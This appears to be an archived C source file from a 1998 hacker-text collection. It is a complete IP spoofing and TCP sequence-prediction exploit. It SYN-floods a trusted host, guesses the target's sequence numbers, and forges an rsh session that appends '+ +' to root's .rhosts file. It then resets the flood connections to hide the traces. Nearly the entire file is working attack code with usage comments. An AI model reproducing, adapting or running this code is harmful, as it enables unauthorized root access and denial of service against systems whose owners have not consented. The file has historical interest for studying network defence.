home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / internet / ipsncode.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  18.3 KB  |  482 lines
  1.  
  2.  
  3. **************************************************************************
  4.    HACK: An IP spoofing and sequence number exploiting program
  5.  System: TCP/IP
  6.  Source: Mike Neuman, mcn@EnGarde.com
  7. **************************************************************************
  8.  
  9. /* This source is subject to the GNU PUBLIC LICENSE. It can be used freely
  10.  * for any non-commercial purpose, and this message and the contact
  11.  * information must remain intact. For commercial purposes, you MUST contact
  12.  * us to obtain a license for it's use. A copy of the GNU PUBLIC LICENSE is
  13.  * available from: ftp://aeneas.mit.edu/pub/gnu/
  14.  *
  15.  *     This program is distributed in the hope that it will be useful,
  16.  *  but WITHOUT ANY WARRANTY; without even the implied warranty of
  17.  *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  18.  *  GNU General Public License for more details.
  19.  *
  20.  * Mike Neuman
  21.  * En Garde Systems
  22.  * 525 Clara Avenue, Suite 202
  23.  * St. Louis, MO  63112
  24.  * mcn@EnGarde.com
  25.  */
  26.  
  27. #include <stdio.h>
  28. #include <setjmp.h>
  29. #include <signal.h>
  30. #include <sys/types.h>
  31. #include <sys/socket.h>
  32. #include <netinet/in_systm.h>
  33. #include <netinet/in.h>
  34. #include <net/if.h>
  35. #include <netinet/if_ether.h>
  36. #include <netinet/ip.h>
  37. #include <netinet/tcp.h>
  38. #include <errno.h>
  39. #include <netdb.h>
  40.  
  41. #include "ipbpf.h" /* Include ipbpf header */
  42.  
  43. #define BADHOST "16.17.18.19"
  44.   /* The host to spoof flooding the trusted
  45.    * host's destination port from. This host shouldn't exist, but should have
  46.    * correct routing entries. The important part is so that returned packets
  47.    * go to nowhere.
  48.    */
  49.  
  50. #define NUMSEQUENCE 80
  51.   /* The number of connections to spoof from BADHOST. I made this big.
  52.   * I've found 4.4BSD will be flooded with only 8 unacked connections. Your
  53.   * mileage may vary
  54.   */
  55.  
  56. #define NUMTESTS 10
  57.   /* How many samples of the sequence numbers do you want to take?
  58.    * I randomly picked 10 and only take the last result. If I wanted to be
  59.    * elegant, I'd do some sort of statistical average. Sequence numbers
  60.    * are generally updated by a fixed number, this attempts to compute
  61.    * this number taking into account average network lag. Fixed sequence
  62.    * number updating currently works on: Solaris 2.x, NeXTstep, 4.4BSD, and
  63.    * probably others, although I haven't tested them.
  64.    */
  65.  
  66. #define ROUTER "router.EnGarde.com"
  67.   /* The name of your router to the outside world. Spoofed packets need to
  68.    * be sent to it's ether/fddi address in order to get to the outside world.
  69.    */
  70.  
  71. main(argc, argv)
  72. int argc;
  73. char *argv[];
  74.  
  75. {
  76. struct hostent *he;
  77. u_long trust_addr, targ_addr;
  78. u_long seq_num[NUMSEQUENCE], port_num[NUMSEQUENCE];
  79. u_long next_seq, offset;
  80.  
  81.         if (argc!=3) {
  82.                 fprintf(stderr, "Usage: %s trusted-host target\n",argv[0]);
  83.                 exit(1);
  84.         }
  85.         if ((he=gethostbyname(argv[1]))==NULL) {
  86.                 trust_addr=inet_addr(argv[1]);
  87.                 if (trust_addr==(u_long)-1) {
  88.                         fprintf(stderr, "Unknown host %s\n", argv[1]);
  89.                         exit(1);
  90.                 }
  91.         } else
  92.                 bcopy(he->h_addr, &trust_addr, 4);
  93.  
  94.         if ((he=gethostbyname(argv[2]))==NULL) {
  95.                 targ_addr=inet_addr(argv[2]);
  96.                 if (targ_addr==(u_long)-1) {
  97.                         fprintf(stderr, "Unknown host %s\n", argv[2]);
  98.                         exit(1);
  99.                 }
  100.         } else
  101.                 bcopy(he->h_addr, &targ_addr, 4);
  102.  
  103.         printf("Initializing Packet Filter\n");
  104.         use_best(); /* Use the best packet filter available on this system */
  105.         if (init_filter("tcp", NULL)) {
  106.                 /* Initialize the packet filter and read only TCP packets */
  107.                 fprintf(stderr, "Can't init Packet Filter\n");
  108.                 exit(1);
  109.         }
  110.  
  111.         /* First, send NUMSEQUENCE connection requests from BADHOST to the
  112.          * trusted host on a trusted port (currently 513). Trusted host will
  113.          * attempt to SYN-ACK these. If BADHOST doesn't exist, there will never
  114.          * be a response ACK. Consequently, trusted host's connection queue wil
  115. l
  116.          * fill and it will no longer respond to any packets to port 513.
  117.          */
  118.  
  119.         printf("[Hosing Trusted Host...]\n");
  120.         if (hose_trusted(argv[1], trust_addr, seq_num, port_num)) {
  121.                 fprintf(stderr, "Couldn't hose %s\n", argv[1]);
  122.                 exit(1);
  123.         }
  124.  
  125.         /* Next, do a sampling of the difference in sequence numbers. These pac
  126. kets
  127.          * are NOT spoofed as receiving the reply is required. Consequently, th
  128. is
  129.          * host can appear in any packet traces.
  130.          */
  131.         printf("[Determining sequence numbers...]\n");
  132.         if (determine_sequence(argv[2], targ_addr, &next_seq, &offset)) {
  133.                 fprintf(stderr, "Couldn't determine sequence numbers for %s\n",
  134.  argv[2]);
  135.                 exit(1);
  136.         }
  137.  
  138.         printf("=>Next sequence number is: %u, offset is: %u\n", next_seq, offs
  139. et);
  140.  
  141.         /* Next, do the actual spoofed connection, now that we know what the ne
  142. xt
  143.          * sequence number will be.
  144.          */
  145.         printf("[Spoofing Connection...]\n");
  146.         if (spoof_connection(trust_addr, argv[2], targ_addr, next_seq)) {
  147.                 fprintf(stderr, "Couldn't spoof connection to %s\n", argv[1]);
  148.                 exit(1);
  149.         }
  150.  
  151.         /* Finally, reset all of the half started connections on trusted-host.
  152.          * This will put trusted-host back into it's normal state (and hide
  153.          * the traces that it was used for evil.
  154.          */
  155.         printf("[Cleaning Up Trusted Mess...]\n");
  156.         if (reset_trusted(argv[1], trust_addr, seq_num, port_num)) {
  157.                 fprintf(stderr, "Couldn't reset %s. Sucks to be it.\n", argv[1]
  158. );
  159.                 exit(1);
  160.         }
  161.  
  162.         /* fin */
  163.         exit(0);
  164. }
  165.  
  166. hose_trusted(trust_host, trust_addr, seq_num, port_num)
  167. char *trust_host;
  168. u_long trust_addr;
  169. u_long seq_num[NUMSEQUENCE];
  170. u_short port_num[NUMSEQUENCE];
  171. {
  172.         int i;
  173.         u_long start_seq=49358353+getpid(); /* Make this anything you want */
  174.         u_long start_port=600; /* Make this anything you want */
  175.         struct ether_header eh;
  176.         u_long bad_addr;
  177.  
  178.         /* First attempt to find the hardware address of the trusted host */
  179.         if (ether_hostton(trust_host, &eh.ether_dhost)) {
  180.                 /* If that fails, find the hardware address of the router */
  181.                 if (ether_hostton(ROUTER, &eh.ether_dhost)) {
  182.                         fprintf(stderr, "Can't determine ether addr of trusted
  183. host or router.\n");
  184.                         return(1);
  185.                 }
  186.         }
  187.         eh.ether_type=ETHERTYPE_IP;
  188.  
  189.         if ((bad_addr=inet_addr(BADHOST))==(u_long)-1) {
  190.                 fprintf(stderr, "Can't convert BADHOST address.\n");
  191.                 return(1);
  192.         }
  193.  
  194.         /* Send a whole bunch of spoofed SYNs. Arguments to sendtcppacket_simpl
  195. e
  196.          * are:
  197.          * sendtcppacket_simple(
  198.          *     struct ether_addr source_hardware_address,
  199.          *     struct ether_addr destination_hardware_address,
  200.          *     u_long            source_ip_address,
  201.          *     u_long            destination_ip_address,
  202.          *     u_short           source_port,
  203.          *     u_short           destination_port,
  204.          *     u_long            sequence_number,
  205.          *     u_long            acknowldegement_number,
  206.          *     int               TCP flags (SYN, RST, ACK, PUSH, FIN),
  207.          *     char *            data,
  208.          *     int               datalen)
  209.          */
  210.         for (i=0;i<NUMSEQUENCE;i++) {
  211.                 port_num[i]=start_port++; /* record the ports and sequence numb
  212. ers */
  213.                 seq_num[i]=start_seq++;   /* for later reseting */
  214.  
  215.                 sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
  216.                         bad_addr, trust_addr,
  217.                         port_num[i], 513, /* 513 is rlogin/rsh port */
  218.                         seq_num, 0,
  219.                         TH_SYN, NULL, 0);
  220.         }
  221.         return(0);
  222. }
  223.  
  224. jmp_buf env;
  225.  
  226. void timedout()
  227. {
  228.         longjmp(env, 1);
  229. }
  230.  
  231. determine_sequence(targ_host, targ_addr, next_seq, offset)
  232. char *targ_host;
  233. u_long targ_addr, *next_seq, *offset;
  234. {
  235.         struct hostent *he;
  236.         struct ether_header eh, eh2;
  237.         struct ip iph;
  238.         struct tcphdr tcph;
  239.         int i;
  240.         u_long start_seq=4138353+getpid(); /* Make this anything you want */
  241.         u_long start_port=600;           /* Make this anything you want */
  242.         u_long my_addr;
  243.         char buf[80];
  244.         u_long prev_seq=0, diff=0;
  245.  
  246.         *offset=0;
  247.         /* first attempt to get the destination's hardware address */
  248.         if (ether_hostton(targ_host, &eh.ether_dhost)) {
  249.                 /* If that fails, get the router's hardware address */
  250.                 if (ether_hostton(ROUTER, &eh.ether_dhost)) {
  251.                         fprintf(stderr, "Can't determine ether addr of trusted
  252. host or router.\n");
  253.                         return(1);
  254.                 }
  255.         }
  256.         eh.ether_type=ETHERTYPE_IP;
  257.  
  258.         gethostname(buf, 79);
  259.         if ((he=gethostbyname(buf))==NULL) {
  260.                 fprintf(stderr, "Can't get my hostname!?\n");
  261.                 return(1);
  262.         }
  263.         bcopy(he->h_addr, &my_addr, 4);
  264.         for (i=0;i<NUMTESTS;i++) {
  265.                 /* Do a setjmp here for timeouts */
  266.                 if (setjmp(env))
  267.                         fprintf(stderr, "Response Timed out... Resending...\n")
  268. ;
  269.                 signal(SIGALRM, timedout);
  270.                 alarm(0);
  271.                 alarm(10); /* Wait 10 seconds for reply */
  272.                 sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
  273.                         my_addr, targ_addr,
  274.                         start_port, 514, /* 514 is rsh port */
  275.                         start_seq, 0,
  276.                         TH_SYN, NULL, 0);
  277.                 /* Send connection request packet */
  278.  
  279.                 for (;;) {
  280.                         /* Wait until the reply is received. Arguments for read
  281. packet
  282.                          * are:
  283.                          * readpacket(
  284.                          *  struct fddi_header  fddi_header,
  285.                          *  struct ether_header ether_header,
  286.                          *  struct ip           ip_header,
  287.                          *  struct udphdr       udp_header,
  288.                          *  struct tcphdr       tcp_header,
  289.                          *  char *              data,
  290.                          *  int                 datalen)
  291.                          *
  292.                          * return type is the type of packet read
  293.                          */
  294.  
  295.                         while (readpacket(NULL, &eh2, &iph, NULL, &tcph, NULL,
  296. NULL)!=
  297.                                 PTYPE_IP_TCP) ;
  298.                         if (ntohs(tcph.th_dport)==start_port &&
  299.                                 ntohs(tcph.th_sport)==514) {
  300.                                 /* If the ports match, it's probably a reply--t
  301. his isn't
  302.                                  * definite, but it's a pretty good guess .
  303.                                  * The following attempts to generate a reliabl
  304. e sequence.
  305.                                  * Actually, it's pretty dumb. It tries 10 time
  306. s, then takes
  307.                                  * the last result. Generally, I've found this
  308. to work well
  309.                                  * enough to warrant not writing anything smart
  310. er.
  311.                                  */
  312.                                         if (prev_seq) {
  313.                                                 diff=tcph.th_seq-prev_seq;
  314.                                                 printf("(prev=%u, new=%u, diff=
  315. %u\n", prev_seq,
  316.                                                         tcph.th_seq, diff);
  317.                                         } else
  318.                                                 diff=0;
  319.                                         if (*offset==0)
  320.                                                 *offset=diff;
  321.                                         else {
  322.                                                 if (*offset!=diff)
  323.                                                         printf("Difference in O
  324. ffset: old=%u, new=%u\n",
  325.                                                                 *offset, diff);
  326.                                                 *offset=diff;
  327.                                         }
  328.                                         prev_seq=tcph.th_seq;
  329.                                         sendtcppacket_simple(
  330.                                                         &(eh.ether_shost), &(eh
  331. .ether_dhost),
  332.                                                         my_addr, targ_addr,
  333.                                                         start_port++, 514,
  334.                                                         start_seq++, 0,
  335.                                                         TH_RST, NULL, 0);
  336.                                         /* Send a reset to close the connection
  337. . Note, this
  338.                                          * automatically will be sent by localh
  339. ost unless
  340.                                          * a service is listening on whatever p
  341. ort you've
  342.                                          * chosen to start with at the top of t
  343. his routine.
  344.                                          * so I reset it anyway
  345.                                          */
  346.                                         break; /* out of infinite for */
  347.                                 }
  348.                 } /* of infinite for */
  349.                 alarm(0);
  350.         } /* for i=0 i<numtests... */
  351.         *next_seq=prev_seq+*offset;
  352.         return(0);
  353. }
  354.  
  355. spoof_connection(trust_addr, targ_host, targ_addr, next_seq)
  356. u_long trust_addr, targ_addr, next_seq;
  357. {
  358.         struct ether_header eh;
  359.         char buf[80];
  360.         struct hostent *he;
  361.         u_long my_addr;
  362.         u_short port=513;
  363.         char *string="0\0root\0root\0echo + + >>/.rhosts\0";
  364.         int stringlen=32;
  365.         u_long seq=385773357;
  366.         int i;
  367.  
  368.         /* As before, get the target's hardware address */
  369.         if (ether_hostton(targ_host, &eh.ether_dhost)) {
  370.                 /* If that fails, get the router's hardware address */
  371.                 if (ether_hostton(ROUTER, &eh.ether_dhost)) {
  372.                         fprintf(stderr, "Can't determine etheraddr of target ho
  373. st or router.\n");
  374.                         return(1);
  375.                 }
  376.         }
  377.         eh.ether_type=ETHERTYPE_IP;
  378.  
  379.         /* Send a syn with our own sequence number */
  380.         sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
  381.                 trust_addr, targ_addr,
  382.                 port, 514,
  383.                 seq++, 0,
  384.                 TH_SYN, NULL, 0);
  385.         usleep(5000); /* wait for the other side to SYN,ACK */
  386.  
  387.         /* Send the ACK for the sequence number we guessed. I've found we guess
  388.          * right about 90% of the time
  389.          */
  390.         sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
  391.                 trust_addr, targ_addr,
  392.                 port, 514,
  393.                 seq, ++next_seq,
  394.                 TH_ACK, NULL, 0);
  395.  
  396.         /* Now, send our rsh request with the proper sequence and ACK nubmers *
  397. /
  398.         sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
  399.                 trust_addr, targ_addr,
  400.                 port, 514,
  401.                 seq, next_seq,
  402.                 TH_ACK, string, stringlen);
  403.         seq+=stringlen;
  404.  
  405.         sleep(1); /* Wait for it to be received, ACKd, and processed */
  406.         /* Send a fin with the our new sequence number and their sequence numbe
  407. r */
  408.         sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
  409.                 trust_addr, targ_addr,
  410.                 port, 514,
  411.                 seq, next_seq,
  412.                 TH_FIN, NULL, 0);
  413.  
  414.         for (i=1;i<4;i++) { /* Send a bunch of ACKs */
  415.                 /* If we screwed up the guessing the correct sequence number th
  416. e remote
  417.                  * host is using, guess a whole bunch more just to be sure. We
  418. could
  419.                  * probably reset the connection, but it's better to have the
  420.                  * net software hang waiting for a proper FIN/ACK than have the
  421.                  * application that we've spoofed into running exit because we
  422.                  * reset the connection.
  423.                  */
  424.                 sleep(2);
  425.                 sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
  426.                         trust_addr, targ_addr,
  427.                         port, 514,
  428.                         seq+1, next_seq+i,
  429.                         TH_ACK, NULL, 0);
  430.         }
  431.         usleep(50000); /* Finally, send a RST */
  432.         /* Now, if we're really screwed, and ~8 seconds later  we haven't guess
  433. ed
  434.          * the right sequence number, just reset the connection. Hopefully by n
  435. ow
  436.          * the application has done it's job, so resetting shouldn't cause any
  437.          * problems.
  438.          */
  439.         sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
  440.                 trust_addr, targ_addr,
  441.                 port, 514,
  442.                 seq+1, next_seq+4,
  443.                 TH_RST, NULL, 0);
  444.  
  445.         return(0);
  446. }
  447.  
  448. reset_trusted(trust_host, trust_addr, seq_num, port_num)
  449. u_long trust_addr;
  450. u_long seq_num[NUMSEQUENCE], port_num[NUMSEQUENCE];
  451. {
  452.         struct ether_header eh;
  453.         u_long bad_addr;
  454.         int i;
  455.  
  456.         if (ether_hostton(trust_host, &eh.ether_dhost)) {
  457.                 if (ether_hostton(ROUTER, &eh.ether_dhost)) {
  458.                         fprintf(stderr, "Can't determine ether addr of trusted
  459. host or router.\n");
  460.                         return(1);
  461.                 }
  462.         }
  463.         eh.ether_type=ETHERTYPE_IP;
  464.  
  465.         if ((bad_addr=inet_addr(BADHOST))==(u_long)-1) {
  466.                 fprintf(stderr, "Can't convert BADHOST address.\n");
  467.                 return(1);
  468.         }
  469.  
  470.         /* Reset all of the connections we started before */
  471.         for (i=0;i<NUMSEQUENCE;i++) {
  472.                 sendtcppacket_simple(&(eh.ether_shost), &(eh.ether_dhost),
  473.                         bad_addr, trust_addr,
  474.                         port_num[i], 513,
  475.                         seq_num[i], 0,
  476.                         TH_RST, NULL, 0);
  477.         }
  478.         return(0);
  479. }
  480.  
  481.  
  482.